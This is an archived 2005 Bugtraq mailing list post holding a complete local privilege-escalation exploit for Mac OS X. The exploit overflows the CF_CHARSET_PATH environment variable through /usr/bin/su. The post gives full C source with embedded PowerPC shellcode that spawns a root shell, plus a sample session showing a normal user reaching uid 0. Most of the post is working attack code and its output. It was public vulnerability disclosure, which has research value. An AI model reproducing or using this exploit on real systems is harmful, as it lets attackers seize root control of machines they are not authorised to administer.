lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050322035258.20223.qmail@www.securityfocus.com>
Date: 22 Mar 2005 03:52:58 -0000
From: Vade 79 <v9@...ehalo.deadpig.org>
To: bugtraq@...urityfocus.com
Subject: Mac OSX[CF_CHARSET_PATH]: local root exploit.




This is simply an exploit for the iDefense adv posted today/yesterday, exploits via /usr/bin/su.

original adv:
www.idefense.com/application/poi/display?id=219&type=vulnerabilities

original exploit:
http://fakehalo.us/xosx-cf.c


--- example usage ---

server:/tmp v9$ id
uid=502(v9) gid=502(v9) groups=502(v9)
server:/tmp v9$ gcc xosx-cf.c -o xosx-cf
server:/tmp v9$ ./xosx-cf
(*)MacOS X[CF_CHARSET_PATH]: local root exploit.
(*)by: v9@...ehalo.us, found by iDefense adv. (anon)

[*] setting up the environment.
[*] executing su... (press ENTER at the "Password: " prompt)

Password:
sh-2.05b# id
uid=0(root) gid=502(v9) groups=502(v9)


--- xosx-cf.c ---

/*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]*********
 *                                                         *
 * by: v9@...ehalo.us (fakehalo/realhalo)                  *
 *                                                         *
 * found by: iDefense (anon finder)                        *
 *                                                         *
 * saw the advisory on bugtraq and figured i'd slap this   *
 * together, so simple i had to.  exploits via the         *
 * /usr/bin/su binary.  you must press ENTER at the        *
 * "Password: " prompt.                                    *
 ***********************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */
 "\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb"
 "\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae"
 "\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5"
 "\x2a\x79\x38\x7f\xfe\xd8\x90\x61\xff\xf8\x90\xa1\xff\xfc"
 "\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02\x7c\xa3"
 "\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e"
 "\x2f\x73\x68\x58";
int main(void){
 unsigned int i=0;
 char *buf,*env[3];
 printf("(*)MacOS X[CF_CHARSET_PATH]: local root exploit.\n");
 printf("(*)by: v9@...ehalo.us, found by iDefense adv. (anon)\n\n");
 if(!(buf=(char *)malloc(1100+1)))exit(1);
 memcpy(buf,"CF_CHARSET_PATH=",16);
 printf("[*] setting up the environment.\n");
 for(i=16;i<1100;i+=4)*(long *)&buf[i]=(0xbffffffa-strlen(exec));
 env[0]=buf;
 env[1]=exec;
 env[2]=NULL;
 printf("[*] executing su... (press ENTER at the \"Password: \""
 " prompt)\n\n");
 if(execle("/usr/bin/su","su",0,env))
  printf("[!] failed executing /usr/bin/su.\n");
 exit(0);
}


Powered by blists - more mailing lists